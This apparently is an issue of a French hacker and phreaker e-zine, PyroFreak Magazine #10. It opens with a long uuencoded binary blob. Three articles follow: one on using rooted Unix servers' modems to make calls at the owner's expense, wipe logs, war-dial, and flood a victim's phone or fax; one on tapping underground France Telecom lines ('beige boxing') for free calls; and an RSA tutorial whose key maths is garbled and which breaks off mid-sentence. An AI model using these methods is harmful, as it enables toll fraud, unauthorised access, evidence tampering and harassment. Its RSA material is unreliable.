M1<=$C1@'TR(O`L^,E$TA$,@)!+1Q"=#/;'>SD%2+`ZTNJD",&9U39-`+82A* M3G!<,002(XR<7PG$%VHTI.084*3OF6_>DQP%WKJJR#%)#N-)MW MH504J"8#MRS^UWQI=)(B"F*3%TZUJ`Z=P9XE5;PF1#U-\2Q!3V!VK:H**ES. M=TB#$?36D64H;R+(`E7T@%)(L0FO';I;+WH68E)VI%NXD@=SI7,0Q8'XN@Q6IT/05(;.M-##CY.6MC.WG4I]A/?8V-Q*[)V,'G7 M3B,C4L=)JTT=UHV%*E7=PO*GEG.%DEE-+A&1%,4RZF M4X:1-(]B\"=N&Z+DF,&C0`FB0&5S(AKRBE9.6$-2?:Z'RBTIGIKJ2": M2*>U:L1U25DO:$Z&C85>K<]3`*V@B,04LLU,>@;'FLBN=!Q!I_MYJ\3"D<`1 M0-Y;BO>G`VT@3>,P3D M6%Z%7D_B4A"V.7!61%FJD2(@C;S79V"5AV$WKE&9,CQ1CK516"TDVKU?64C:Z>+HID2(V44P2X1XYTFIFQVC'VD[]:L&I5X`F;R`W5X`79)/*H MK#((4:\V.'"TV"3JH)<8J:9?3EY`6\F;P:R-9[%G(=9K31FMB<:*T#)!BTQ' M$2^/(3+87L]"2OK<&$D(C)7Z.6&)G%BFV`U$RBFRCE>F%,FH.AP2(EVV::V0KE$%C'(4\G5#;`)"!MLT2+7*@1+@;BN%/ MMITZ(?`+\OFLP"(AH(ZBJE1R:1^`?613=270JT;.1A6;\C0#[S5K4TZ\!,D' M&A>ZQ5*&&]X3MI?ZOI&=EW%G/&>4UV,8EUJ6CABMH1SR35@G*&E_2@),D1OB M,^6$C4NJ,"%;#RE0QH9@#-;93Y2-@B?8AG``(C?JEHMY`#+)T"@@@,S-KB:P MYI'I5F'*-K2J62%&UI/%&(;2(I)O..:W2+K53+@OC+G)K MM5XEC*?3C,R0\WB*[9[!D#@AJH3UZ*1SS[D=UN3K/GP$%J16-4%<5X+\T2.) M$,ELJS_EH+M5:V'KD2(<,%2E3%6AT8[(LX+H=5AC@'%D):5PE!I/4`AP@KB? MPBYBR<5:9:;4$2EW0.Y6'(JR$/`3ELC&8+K(85.;0QF3]#02NV5>E2.!VB-$ MA!8ZV4":*2)4TJQ]8KZ$V[H2C^"EB5EP#G6V,U:KK7(E)Z`>%OR]59T3J$2I M[E6M&8'01/E7*+4\TR-.0A8)/"<4G>!TB5"M#`K&0WD9W`FY\<9VRZ$0L26L M3SM%IX#@%0:4DJI;2$_`,3N'11H!"R3N`W]DADYE@$0(2W2VH"! MFN@$RR$-&&5N^3`32*&)!\5D(NO1>7*`A=">_;`2T:N=DA5K#<1DP!%'4),6 M#E]R#XCF4&4!F*)8@.X!(VCD>E!]M?Y(GP_05:0WT-@`DB+V#RC)' M=1T;)F&1$F^K6%;H]B0/N&PD?H6L&0A)SP>`;B8_YEXCC%II354EAJNN/3,% M5X[(FRC312[&;0&Z( M?\%.LJ9GQL"FA;5T7;N@1>S,00?/C"6VH!"EI*4L/)8'URR=4TQ3.27J3U%$ M;&U,E-?Z`HV2,GJ81D3Z3/F<92PHZ[LG@D[Y=DK$'>]/>@$TDN>$9I7.IGX> M6YX_,I,4$."AO%4^?)M-.I4'+ M$>1IA=X9A=#8]S$B%Q#$C9TMK)Q04I7"DJ:H!7LM#PE,O=HB,O)XBCM6BU)0 MK/:8&8"=GI8#>"+_TE.OW":`(.D9X0^QD/!H\LC\#%4C97F@2_>GI=($>H,@ M7%LEJ6#1A!6%S%CR$B9$>3Z']ZP0S5NU'G`4G6D:!/^1B6IG%D@A8N>7/)(!5)2&,DV),+Q$Y+/2^[7GL' MU91!C71*/$JO;7L";(P:D81D-8&)I;XJ6Q[M:Z?S`,CRO!U5O$K).='99))1 MZM3/*;A&FA5C>QH`67TD_9>'_@RGN(,6*K-^-A4DB'DB?8`6@1-05`59.]*'LPXTCS@,+`XI)9W!@P:&1$]4@'%EG_I3>&[T)2JT M.A.\/A)'@U(3N`[AM>(RF;%%==#&U$^P8H0VA&C/U(WE*0J*]A-DR_N)`#)F MX`>=DABE=&A/X6(/(2:R4!Y*FN3Z^1?P%'Y'U4&OQS$2UH80!:R_]C"(6$EV MZ48P-^-H'Q*>F3.AJ$R@TH[L"E&U'/&VJ&Y%`F5R=+(!S!@5/=4P1I`U[)$0 M7`8#,MCF$,`=`BMCPRE?A!3T5F$&4C;9,50D1BD?PCE0<<9>/,8Q$/ M>1K"D+3E9+]5ZQ5#T&E/,F"'@CP*&`$N9IK_<^TV)QN)>X9\GK(TT$;9\!S\ M9>Q/_4'WR3$U]H@KL_1DHU+#%-OW\N@2CXJLW5I$N/X,E\&,AOGVO,*$W)_. M;KV7#FD,56:@V9*3-"MAXP@J0:=]L#VDMS1NEB*T&HACR`)5!WH!49U?3FRTBO)L!:N.%'$B`R5)H=446#D+;_M@$@Q` M4CTY&`"3(;\;8Z9*25V'+^6"YH/`)<`VK5?)K,N.JP9K@*-3!P'$5D"*7O$# MSHAVB@@$S:'5K_/$*0UIM#E5ZO%5`@>IXJ=]LER0 M!X.A2!%[#21+N"KY!V0RB2Q:!87YZG=5;DGF\OP0[0/1*CHZQ^$)>AY;/I2, ML!-A"8AILJD_>8D@@;2+SK-S%(%'JIZ/R/OP)^$\,%YLGN%"<@$'(4\%<1?6 MT)/I"!FCU%15U`:):NSGD8B.K)RF4$R%8OH)3>+E@7NRL3$**WMV&R%H!$B* M$QSF,,5V;J@!GH0EE@>CS>:LT(`#6WI64Y;BK")$53IA2Y2W($,7UO>Z<)B< MT[)5E6!+K)V]>`\_S:GYOX]1Y(;4"$_"3*SQ3T"1H(H?[,V'3/Z![,L4VM:9 M):A\"I1M&L"=).8D$?Q`PN@I":TL&$C#1!@&$E2JWV2K#+"!V(MUV7'2AV"% M&?0SZ!$T/">J3R!$0)#M]PO.N3RU)Y5"QF[[;Q;*V5(0K:8ILA\=62(@1AI' M)W^E\E,>_6[6SJ)"*D@\T6C$)3KSDN4P28OV6P8V(J_KI[WEMQ.<_*.<#R4( MM>K?PJXRG0)*4#;$&3.\+#\A^;E^H[K]O=T_>^3MY^V__^(ICCDU7+S+H&!7Y?7N1K. MEN>KD(;R>^&SP^U/-4^6L?PT;/=5$K[\N'*]');^20KKV@.]A]EZ"&XQ^%3> M*Q&'9[-U_>'H<6E]XZ`-[>(6-*-_0+ MNYV79@TSI!WU?77.KEAR'K()OW M1NP_/YP=#/OUMVVSA]\_O_[L>OE)_N]^-WMX,.QV?\#*6RZH(=LV9`\/MDWX MM@G?-N&[3<2VB=@V$;M-Y+:)W#:1.TUP[XO::'^?EG65YCX8_D8SU"MEG&V? MK^]_>^_S?7?H#Q?HZ*[7]R+\[2:-Y4O/^GO'Q4-Z5/AJ^&!X4*1/OZ]L;TG`WX_:NQ(N_&KPHZ^.7K_VT8-ZL;QM!+.\^'[D M#R]<*)L].]I[64;]OBH-]_?V+@Y2UGKTZL5R]4%IN_?#W4CNZ^/^&Y^]-JEU5'URN_F),F;PT?/J=5WJ^V55QJ1 MN+^"_=26I)+O5H=H<#CP@]V+N%!NB(-+6LK+6JK+6NK+6IK+6MK+6HZ7M9PN M:\G994WYI7OBEVZ*7[HK?NFV^*7[XFUC70%=VMP^)#5`']!*4\8179F7*ZMV MY>7KME-^^`J[V7U-2'$.H%)]%<[&8`_I;1[/UTO$BF9"Y M$P1'P=CI;/VZ:T2W=I=?G5]^>?6:6:[3R2EM%CX,./?G.'>MW?O'L#IWZMW^JTNC^'FS8UL#H8//D"S?:#%(IR<[N]75__H8-CI='`X M;"Y7\6X[8R1V0#/1OD[<.AS_MBR\7BE*+B][:&L[VEQ]L+WZH%U=I?7Y:E'^ M>-FV];():[$<3E?IVE9")+H;F.UI&A;IV;!=@,+/U8>$UC5/47]#_X&;S\MOY&FKKM,V@^UQYE5)= MI7^.91YL+K^R/]4,Y[V+'4J$/;ATJ`=TN>NB.-W,S6<_DN`O2!:WSX^O7[^^ M83]+1/U"`9K@^^**_"]B^\'0WU#5?]0/#@<&]&-:Y@M-#V@UF\6]/M1V+'7Y M$)CMB ML.PG2&LJXS@;SL+*G8!H@FNLC],)H/-\351NMO[P;#L.>"O@UP%A,==CK`"M MAS-WDCJEA@=C:>?S-1'&`KT';\"Z;@X755-"1]7*YET0LX=_ATKKW2=T]PGN M0G?X0M[06>:3G6';!0)MZO?V-5Z].MNZ=\'[3C?8T86+1$])P76"UV[R=A/+ M!9X<#.]OE'Q9:[';6OQ4:[G;6E[:ND0PM-ILX>@UR?=O?]N&QB:D.JS:';8! MR%X;N,3U?7*Y9\PA^'JS;+5+NW7&.7^!W6NPZ'^NSJ@`2_L81N^ M-Y>+M/NMU4HQG[FQXMIJMUTB"-V]E+(ONB7D)-RV+0U(1D(R>I<,2MEXLSPO_ M7SR&^R++!J#7]#:5V_AG0>_**T6-FIO7M)1"&<)V>?$>>B#_J[%K75/!,W") M%*^7//U"%G?K[C>%D/1ET#WNY@2\_- MRW3K]'Q=][E9(&8D,N/=63(*PKQR_6/&A53:V+'\2@FS/CZ>/7DZ/UDL3_\3 M$?C\AV?/7_Q8WO-W^XLO_W#GW_]X]T_W[G_U/[]^\,VW_^O/W_WE/ZY`=95B MUA%C"HTOA5VR>2ET&/4ZCZN#5`.]649XKQ&C-D+[@U5&_%HN523PJ.R_,[8J M@,.A_8&(?1D9OA#:YBFCPZJ4+([ZXA?;+/"CTZ/=LDDEX?LT"0+4/"WJ'P>' MFREJ\S(H=EU53-LHX[F:T/;KOV^=[*-3BC$O?\47CFU?@/;SS?%3 M]5\M5:W_ZO)DL;'EDK3R7?WWE_B\_36\?U\%$M=6H)>O7)L]7KAYN;9'6?N3 MPZ>'\\.3P\7A\HBP_'3N9HOON1@?'GX4CE-X>K177G([?(3QDCLY(J`\3O/3 MGL@>-?`D'KI_4+R2&M_,RU.@V!78\_73Y?K*X15WI3I>/L7:UGF?FAU>>?_L MQOMG?UU<.:RS']9Y7VD8E^?KPRM?]7CT96'7*=X8=OJA1TM\-WB^2D_W*^HN MZ[*&-MR5ORX>K)>EHN[6P_OQ]?^5,2](!V.GYX!GI+H8O!2&Z[AN]3CTD(#O M/WS_D%"IW`N')\N8;HK#'V;IV4UVN/#\II3X1]SDHB(.138"V";RV>+T?%V" M:[E/@H^S4,,'*6__P9TO[]S[YK#NK@%HAP]_^/#&4+:&@?E168Y[>O1JFV=H4Z1`;3:;NXEE8/XW]7+;7J"G16Y& MEW^+X,2;.BU>ZZ1&ZJ3MF_K\^,8^;YG(7^CT:ALP'@BO&LI-3C:*O[>"NLDNTVDQB1+.JMX_*4G-OPWD:YN>4.WJRL%P M8RAP0:2C&W_UG9)ZOG]&ISW%H^8`FNI,Q?3K.@\W8^T:TF]SR<[+`@X.-HS] M++@%7<2T[Y]=.1RZ0U*#2WG5/CE[=X##@6W:0P3%L@Y>]?\R^.^O?=+^LP,8 M;8@M<-11KE[=&?"W`)M2EKO8]J#!5F]XDDZ0Z.]_L%W48:](M$L'!0&H<1=H M7"[2]6&]>I$J?-3,ORQNF-6V&P6+BR#TZ>I\G0J/#6GXW^^??4BG6;?N/;A3 M1@'C+CBT50?,LX#'P8XNA_TK?/@,*.+"&I%PN(MX>?TZNK1&A.4ER_GPK^S# MB[09PQ%QQIC$G+LZJ1M[2/6X7T6#P]^MMY<7I"%^4AKB'Y+&)A>M]Y_T^T_> M)*U=D3_YE:W_IT5W47;R#;)#FZWXY#]5?/7^TW[_:;__].\3[ZY&G_[K"_NB MM-5/6JKZ145=[\_[_7F_/_^OJ&+75N;_^@CRJFKT3ZI&_TNIIMX_Z?=/^OV3 M?YKJ=NSQY+^%.B_JT_RD/LU_*WW6^XM^?]'O+WX>?>^:_*^E_7],^1>U;W]2 M^_;_*^W7^\M^?]GO+W]^ZU@<[;K3\K^'K91B?R\7[%0U2KK5*XS;HL'=]">W M^L_SV=EPN]7Z-P7R6K!+JZUIM4[G9^YQ*F6*X?ME?>3MX?#[5ZOKGY3-T(P7 M^@[#-3]L/W]=^YV,PW'@\LZ+M[8<7%^ MDE:SX.;#/KLV7=KYQ[?/NC,"IC]\TRC/AM_W?/23OZXWJ>GCEK1>UN6'"Q/_ MD%9^>99JZD1-2^4&RS[X=:NZ[S[O/N\^[S[O/N\^[S[O/N\^[SZ7?_X?!W;) %/@!X``!J ` end ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 |12-Internet Outdial |(X) Phreak (X) Hack ( ) Autres '.__________Par LeMarquis________ ________ lemarquiz@yahoo.com ______ ___ Le modem est l'éternel compagnon de tout fanatique de hack ou phreak. C'est lui qui nous sert de passerelle a l'univers du binaire. La retraçage de la source d'une quelconque attaque est intimement lié avec modulateur-démodulateur. Chaque appel venant de notre modem est scrupuleusement enregistré sur les serveurs de notre compagnie téléphonique. Sur le net, notre antagoniste à la recherche de notre identité physique devra d'abord identifier notre réelle adresse IP. Et ensuite remonter par notre compagnie d'accès internet jusqu'à notre appel modem. Le fait qu'il est possible de déguiser notre adresse IP par des passerelles nous permet de faire notre travail sans avoir à falsifier notre appel modem. Par contre, lorsque nous devons entrer sur des réseaux internes (dial-in) ou faire de phone scanning, nous sommes en relation direct avec notre cible. Nous pouvons toujours enlever le call-back, mais on peut encore retracer l'appel. Il existe une variété de outdial qui permette de passer par une passerelle téléphonique sur des numéros de téléphone (vmb,pabx). Je traiterais de cette article d'un forme de outdial peu connu, les outdial d'internet. Il y a presqu'une décennie, en pleine explosion des BBS et dans l'éclosion d'internet. On trouvait sur le net, des serveurs unix qui grâce à leurs modems nous permettaient de faire des appels téléphoniques dans leur zone d'appel locale. On évitait ainsi de payer des frais d'appels interurbains. En se connectant sur le net et en passant par un modem de la côte ouest, nous pouvions aller sur un BBS de Vancouver avec un appel local. Sauf que depuis ce temps les BBS ne sont plus populaire et l'abus des serveurs qui offrait leurs modems, a fait disparaître ce service. Priver d'un service légitime, nous sommes obliger de le faire de façon illégitime. Car malgré les apparences, les modems connectés au réseau ne sont pas disparus. Il nous faut les trouver où ils sont essentiel, c'est-à-dire dans les compagnies d'accès internet et utilisant des fax par un serveur unix. La difficulté avec ces box, c'est qu'ils sont rare et ont très souvent une sécurité renforcée. Une fois que nous avons trouver un serveur unix avec un modem, nous devons obligatoirement être en root pour pouvoir l'utiliser. De plus, le serveur doit avoir un connexion de type "eth" ou connexion par cable. Si il n'a qu'un connexion en ppp et un seul modem, si l'on utilise le modem, le serveur serait automatiquement déconnecté du net (et nous du serveur). Un fois toutes ces conditions remplies, le plaisir commence. Nous pouvons en nous connectant via telnet appeler où nous voulons dans le monde. À l'aide de logiciel terminal comme minicom, nous nous connectons a des modems sur le réseau téléphonique. On peut seulement se connecter a des carriers, oublier toutes les vocales. La source de l'appel est bien sur le serveur unix qui héberge le modem. Les appels locales se feront dans l'area dans laquelle se trouve le modem. Nous avons aussi la liberté de faire des longues distances. Ils ne faut pas en abuser. A la fin du mois l'administrateur va sauter en voyant son bill de téléphone et notre plate-forme de hacking va s'éteindre. Le serveur peut aussi être utilisé pour faire du phone scanning. On peut dissimuler en background un programme qui fait le travail par lui-même. Certains gros serveur offrant accès à internet on parfois plus de 10 modems ! Imaginer quelques instant, un scan en shootgun avec 15 modems simultanément. Un autre merveilleux service que peut nous rendre ce modem c'est d'être complètement anonyme sur le net. Disons que tu call par une dizaine de pabx et de vmb outdial, même si tu es très anonyme, il reste que chaque appel venant de ton modem et des outdials est enregistrer. Avec les internet outdial, tu peux te connecter sur internet et après quelques passerelles, te connecter sur le serveur de outdial. Sur ce serveur tu peux ensuite te reconnecter sur internet ! Tu call un accès internet de type shell ou un provider qui offre telnet ou rlogin sans passer par le ppp. Il est toujours possible de marcher par pppd mais sa reste plus compliqué. Le gros avantage avec cette technique est que grâce à notre root accès sur le serveur d'outdial nous pouvons effacer toute trace de notre source IP qui utilise le modem. Route classique: MODEM => PABX => PPP => PASSERELLE => CIBLE Chaque connexions est enregistrées. Route avec internet outdial: MODEM => PABX => PPP => PASSERELLE =>/ SERVEUR OUTDIAL => PABX => PPP PHONE => INTERNET => PHONE => INTERNET Connexions entre la PASSERELLE et le SERVEUR OUDIAL peux être facilement anonyme en falsifiant les logs. Ils existent milles et unes utilisation farfelu que l'on pourrait faire de ces modems. On pourrait sans trop de difficulté se faire un petit script qui pourrait appeler à un numéro précis sans interruption.. On pourrait exécuter se script pendant la nuit et le laisser agir en background. Le numéro est à votre discrétion. Vous pourriez paralyser le téléphone et offrir une nuit blanche à votre ennemi juré. Nous pourrions installer un BBS, une PABX, ou peut-être un boite vocale sur ces modem, si nous somme assez chanceux pour capturer des modems vocales. Une avalanche de message fax pourrait inonder un bureau, grâce à la puissance de nos fameux modems. Avec quelque effort en programmation, une dizaine de modems devinerais rapidement le password d'une PABX. Le modem est le meilleur ami de l'homme. Plus l'homme en possède plus il est puissant. Pourquoi se restreindre a un seul ami ? Être populaire, n'est-il pas la clé du bonheur ? J'espère vous avoir convaincu que lorsqu'il s'agit de modem, cette affirmation est vraie... ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 13-Beige Boxing - Que se cache t'il sous les plaques | FUCK TELECOM (Pour les Français) |(X) Phreak ( ) Hack ( ) Autres '.__________Par Cyberdollar ________ cyberdollar@caramail.com ______ ___ Ce sont des plaques de métal de meme type que les plaques d'egouts qui mesurent environ 40x60 cm mais parfois ce sont des plaques beaucoup plus grandes (60x100) mais un moyen infaillible de les reconnaitre elles ont le logo de Fuck Telecom !! a)OU LES TROUVER ? On n'en trouve pas n'importe ou !! Si vous vous trouvez dans une rue et que vous vous voulez savoir immédiatement s'il y a des plaques FT dans cette rue : regardez en l'air : si vous voyez des cables en l'air alors vous n'en trouverez pas dans cette rue, si aucun poteau ou/et aucunes lignes ne sont suspendues en l'air alors vous trouverez trés certainement une/des plaque(s) FT dans cette rue : en effet s'il y a des plaques par terre ca veut dire que le réseau des lignes téléphoniques de FT est souterrain contrairement aux endroits ou vous verrez des lignes suspendues en l'air... je vous conseille de regarder dans les rues principales car ce sont les grandes rues dans lesquelles FT met les les cables sous terre, meme dans les petites villes (environ 3000 hab.) il y a les lignes sous terre mais uniquement dans la/les rue(s) principale(s) !! b)QUE SE CACHE-T-IL DESSOUS ? Avant de soulever plusieurs de ces plaques je m'attendaient a tomber sur un véritable réseau ou fils & cables s'emméleraient et je m'attendais meme à ne pas pouvoir m'y retrouver, mais une nuit à 3h00 du matin dans un petit coin tranquille, lampe à la main, j'allais bientôt trouver la réponse à tous mes problèmes....... Je soulevais donc la plaque : il y a quatre trous dans les plaques si vous êtes seuls faites comme moi, passez un cable dans le premier trou faites le ressortir dans le deuxième, rentrer le dans le troisième, sortez-le du quatrieme et faites un noeud, de cette manière vous éviterez de faire trop de bruit et en beige-boxing un peu de bruit = beaucoup d'ennuis !! Si vous etes 2 mettez un doigt chacun dans chaque trou et soulevez mais je vous préviens : vous allez en chier !! Voilà, une fois le "coffre" ouvert je comtemplais le trésor, et là à ma grande surprise : il n'y a qu'un ou 2 fils !! Je le dénude délicatement et là une petite dizaine de fils de toutes les couleurs s'entremelaient : je repère le bleu, puis le blanc : je les dénude branche mon tél et ses pinces crocos et là BINGO : j'ai la tonalité !! Voilà tout ceci juste pour vous dire qu'avec le réseau souterrain de FT plus besoin de défoncer les boitiers ni de grimper en haut des potaux pour se faire un peu de BEIGE-BOXING !! Faites-gaffe quand même !! ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 14-Encryption RSA |( ) Phreak ( ) Hack (X) Autres '.__________Par Sabrina ____ ________ sabrina@inorbit.com ______ ___ TCS - 2000 Créé par Sabrina KERCKHOFFS:" Il ne faut pas compter dans un cryptosystème dont la résistance réside dans le fait que l'ennemi ne sache pas comment fonctionne l'algorithme." CRYPTOSYSTEME - RSA I- PRESENTATION DU RSA II- ALGORITHME DE CRYPTAGE RSA 1- Principe fondamental 2- Calcul d'un triplé ( N , C , D ) 3- Algorithme III- RSA EN PRATIQUE IV- CASSER LE RSA 1- Comment casser le RSA 2- Casser le RSA en utilisant les protocoles de communication: Partage du module 3 Cassage du RSA par factorisation du module N Méthode du crible quadratique V- CONCLUSION SUR LE RSA ANNEXE MATHEMATIQUES ======================================================================= I - PRESENTATION DU RSA La cryptographie à clé publique fut créée par Diffie et Hellman, et indépendamment par Merkle. L'originalité de cette découverte réside dans l'existence de 2 clés: l'une pour crypter le message et la seconde pour le décrypter. Les algorithmes qui en découlèrent furent soit impraticables (trop lent), soit trop gourmand en place (le message codé était beaucoup plus grand que le message initial). Le premier algorithme intéressant fut celui de Merkle (algorithme à empilement) mais le RSA resta (et reste) le seul algorithme de cryptage vraiment sûr et utilisable. Le RSA est le plus connu des algorithmes à clé publique. Il est aussi bien utilisé dans le chiffrement de données que dans les signatures numériques. Inventé par Ron Rivest, Adi Shamir et Leonard Adleman, le RSA résiste depuis plusieurs dizaines d'années à toutes les méthodes de cryptanalyse ; même en prenant en compte la puissance gigantesque développée par les ordinateurs actuels. Sa sécurité est contenue dans la difficulté à factoriser les grands nombres. En effet, il n'existe pas d'algorithme performant pour factoriser de tels nombres. II- ALGORITHME DE CRYPTAGE RSA 1- Principe fondamental Le RSA est un cryptosystème à clé publique. Il y a en tous 3 clés. La première est appelée clé publique N, elle est connue de tous et est divulguée librement. La seconde est la clé de cryptage C ; celle-ci est gardée secrète par l'expéditeur du message. Elle ne doit donc pas être divulguée. Enfin, on a la clé de décryptage D ; elle aussi gardé secrète, cette fois par le destinataire. La combinaison des clés N et C permet de crypter le message. Tandis que la combinaison de clé D et N permet de décrypter le message. ============= Image1.gif ============= L'avantage d'un tel système est que même connaissant une partie des données du problème (c'est-à-dire ici N), on ne peut décoder ce message. Mais comme nous le verrons par la suite, il existe des techniques qui connaissant N permettent de retrouver C et D. 2- Calcul d'un triplé ( N , C , D ) Il est conseillé d'avoir quelques notions en arithmétique avant de lire ce paragraphe. Ci-joint une annexe mathématique rappelant les points principaux pour comprendre le RSA. Soit p et q deux nombres premiers de grande taille (plusieurs centaines de chiffre en base 10). Au plus ces nombres seront grands au plus votre cryptage sera fiable ; en contrepartie, le codage sera lent. N la clé publique vaut le produit p*q. C la clé de cryptage est choisie tel que C et (p-1)*(q-1) soient premiers entre eux. D la clé de décryptage est choisit tel que D = C-1 MOD (p-1)(q-1) On obtient ainsi un triplé solution. On remarquera que la donnée de p et q permet de retrouver entièrement la clé de cryptage C et de décryptage D. Pour casser un cryptage RSA, il suffira donc de retrouver p et q à partir de N (ce qui comme prévu dans l'introduction reviens à factoriser N). Mais nous reviendrons sur ce point dans la section IV- 3. Exemple: Recherche d'un triplet solution On prend p et q deux nombres premiers: p = 53 et q = 17. On se restreint ici à des nombres de petite taille pour avoir des calculs simples. On obtient donc d'après les explications précédentes: N = p*q = 901 On choisit la clé de cryptage C pour que C soit premier avec (p-1)*(q- 1). On peut prendre (le choix reste assez arbitraire) C = 83. Enfin, le calcul de D s'obtient en calculant la solution de C = 83-1 mod 901 = 411. Attention ! En apparence les calculs peuvent sembler simple mais la programmation de générateur de clé nécessite de subtils algorithmes (cf Fin de l'Annexe). On obtient donc le triplé ( N , C , D ) = ( 901 , 83 , 411 ). 3- Algorithme Si on considère un fichier informatique c:\command.com par exemple. Ce fichier est, informatiquement parlant, représenté par une suite d'octet. Or, chaque octet représente (dixit la table ASCII étendu) un numéro compris entre 0 et 255. On peut donc, en juxtaposant tous les octets du fichier, dire que c:\command.com est un nombre M (de très grande taille). On va tout d'abord séparer M en une succession d'entier Mi , tous plus petit que N: ========== Image2.gif ========== Cette hypothèse (Mi plus petit ou égal à N) est TRES importante ; le RSA ne fonctionnera pas sinon. On peut maintenant appliquer l'algorithme de cryptage RSA sur chacun de ces entiers Mi. ========== Image3.gif ========== On crypte bien M1 par les clés ( N , C ) et on décrypte W1 par les clés ( N , D ). On retrouve ainsi le schéma du cryptosystème à clé publique évoqué dans la présentation. On remarque que W1 est inférieur ou égal à N (dût au calcul modulo N) ; le fichier crypté sera de même taille que le fichier en clair. Cette remarque prend toute son importance dans la pratique. On peut aussi remarquer que le codage du fichier se fait par Bloc de taille de longueur de N. Exemples: Cryptons le message M précédent par le triplet trouvé en 1- ( N , C , D ) = ( 901 , 83 , 411 ) et M = 330564019 Cryptage: M1C mod N = 3 = W1 M2C mod N = 469 = W2 M3C mod N = 8 = W D'où W = W1-W2-W3 = 003469008 ( donnée cryptée ) Décryptage: W1D mod N = 330 = M1 W2D mod N = 564 = M2 W3D mod N = 19 = M3 On retrouve le message M = M1-M2-M3 = 330564019 III- RSA EN PRATIQUE Dans la pratique, plusieurs utilisateurs possèdent soit la clé C, soit la clé D. Comme vous l'avez sans doute remarqué, C et D joue des rôles totalement symétriques. Si bien que certains utilisateurs pourront utiliser D pour crypter leur message et d'autre pourront utiliser C pour le décrypter ...et vice versa. ========== Image4.gif ========== Par exemple, l'utilisateur 1 pourra envoyer et recevoir des messages des utilisateurs 2, 4 et 5. Tandis que l'utilisateur 2 pourra envoyer et recevoir des messages des utilisateurs 1, 5 et 6. Il y a donc bien un partage des clés. Bien sûr, un tel système s'appuie sur la confiance des utilisateurs avec lesquels les clés sont partagées (problème de certification). Par ailleurs, la clé N est connu de tous, même de vous. Un tel système justifie bien le fait que C et D sont appelés souvent clé privé… IV- CASSER LE RSA 1- Comment casser le RSA Si le RSA est encore actuellement utilisé pour crypté des données très importantes (cartes bancaires, compte en banques, virement boursier, Microsoft Windows, netscape..), c'est parce qu'avant tout, il est très difficile de le casser. Il existe cependant 2 grandes méthodes de cassage du RSA. La première est celle qui consiste à utiliser les 'vices de formes' des protocoles de transmission d'information (il faut garder à l'idée que le RSA nécessite 3 clés ; on peut utiliser certaines astuces, par combinaison des clés, pour obtenir notre message en clair). La seconde méthode est d'utiliser notre seule hypothèse de départ: N. Pour des raisons qui viendrons d'elles même, nous nommerons ces algorithmes: attaque brut (par analogie aux attaques brutes force sur serveur ftp ;) 2- Casser le RSA en utilisant les protocoles de communication: Partage du module Si l'on reprend la méthode de génération des clés, il est facile de voir que pour une même clé publique N ; il peut y avoir plusieurs clé privé C et D. L'attaque suivante est valable lorsque vous connaissez N, C1 et C2, où C1 et C2 représentent 2 clé privées basées sur le même module N. C'est-à-dire que les clés C1 et C2 ont étaient créé à partir du même nombre N. On suppose ensuite que le message M clair a été crypté avec la clé C1 et avec la clé C2. On obtient 2 messages cryptés W1 et W2. W1 = MC1 mod N W2 = MC2 mod N On peut maintenant très facilement décrypter le message M initial. Pour cela, il suffit de trouver deux nombre a et b tel que: a*C1 + b*C2 = 1 On peut toujours supposer que a < 0 (sinon b l'est), on obtient dans ce cas: (W1-1)-a*W2s = M mod N et on récupère donc le message en clair M. Le cassage du RSA est presque immédiat s'il y a un partage des clés entre utilisateur. Il existe d'autres méthodes de cassage du RSA par utilisation du protocole de transmission des clés, mais comme vous le voyez ces méthodes utilisent des hypothèses très fortes ! Et souvent ceux qui utilisent le RSA en connaissent les failles. C'est là qu'interviennent les autres méthodes d'attaque brut du RSA. 3 Cassage du RSA par factorisation du module N Imaginons que l'on est récupéré le message W1 crypté par écoutes de la ligne ou par vol du fichier crypté. Les clés de cryptage C et D ont été trouvé exclusivement à partir de p et q. On rappelle que N = p * q. Or, comme l'on connais N, il suffit donc de factoriser N pour récupérer les nombres p et q. La sécurité du RSA réside donc exclusivement dans le fait de pouvoir factoriser N. On pourrait dans un premier temps penser que factoriser N est une chose facile, car finalement, il suffit de tester (N divise A) pour toutes les valeurs de A comprises entre 1 et N (on peut même dire que A doit être premier :). Mais le nombre N est, comme nous l'avons annoncé dans la II-2, d'une taille de plusieurs centaines de chiffres: aucuns ordinateur actuel n'est assez puissant pour calculer les divisons successives de N en un temps raisonnable. Cette méthode d'attaque brut prendrait plusieurs siècles !!! Malgré les connaissances actuelles il n'existe pas de d'algorithme permettant de factoriser N facilement…..c'est d'ailleurs ce qui fait toute la force du RSA.. Le RSA est incassable ? Bien sûr que non ! Les cryptanalystes ont trouvé des méthodes permettant de factoriser N en un temps relativement raisonnable. On va étudier ici une des ces méthodes. Mais il faut savoir avant tout que des telles méthodes de factorisation nécessite une excellente maîtrise des langages de programmation car la moindre ligne de code gagné se paie par un temps de calcul parfois divisé par 2. Il faut aussi savoir que casser une clé RSA de 100 chiffres emploie une énorme quantité de calcul, il faut donc plusieurs ordinateurs très puissants. Il existe actuellement 2 grandes méthodes de factorisation de N: la méthode des courbes elliptiques et celle du crible quadratique. La première est résolument la plus difficile d'accès, c'est pourquoi nous allons étudier la seconde méthode… Méthode du crible quadratique La méthode est basé sur l'idée très simple suivante. On suppose connu X et Y tel que N divise X² - Y² = ( X-Y ) * ( X+Y ) On sait que N peut se factoriser sous la forme p*q. Donc, p et q divise N. Pour des raisons mathématiques (évidentes ?), on a p qui divise (X-Y) ou (X+Y). Finalement, on cherche à calculer le plus grand diviseur commun de (N et X-Y) ou (N et X+Y). Ce qui revient à utiliser l'algorithme d'Euclide du calcul d'un pgcd (plus grand diviseur commun). COMMENT DETERMINER X ET Y Pour commencer, on détermine une suite de carrée (an²) tel que |N-an²| < d avec d un entier raisonnable Par ailleurs, en utilisant l'unicité du développement d'un nombre en facteur de nombre premier, on suppose connu des nombres premiers pi tel que: |N-an²|=P (pini) où pi est un 'petit' nombre premier (on entend par petit un nombre qui est parfaitement connu de la machine) Ainsi, on peut toujours supposer pour simplifier que l'on dispose de a1, a2 et a3 tel que: N-a1²=p1n11*p2n21*p3n31 N-a2²=p1n12*p2n22*p3n32 N-a3²=p1n13*p2n23*p3n33 Maintenant, on recherche alors l 1, l 2 et l 3 tel que (N-a1²)l1*(N- a2²)l2*(N-a3²)l3=a ² Il s'agit en fait de résoudre : l 1 n11+l 2 n12+l 3 n13=0 mod 2 l 1 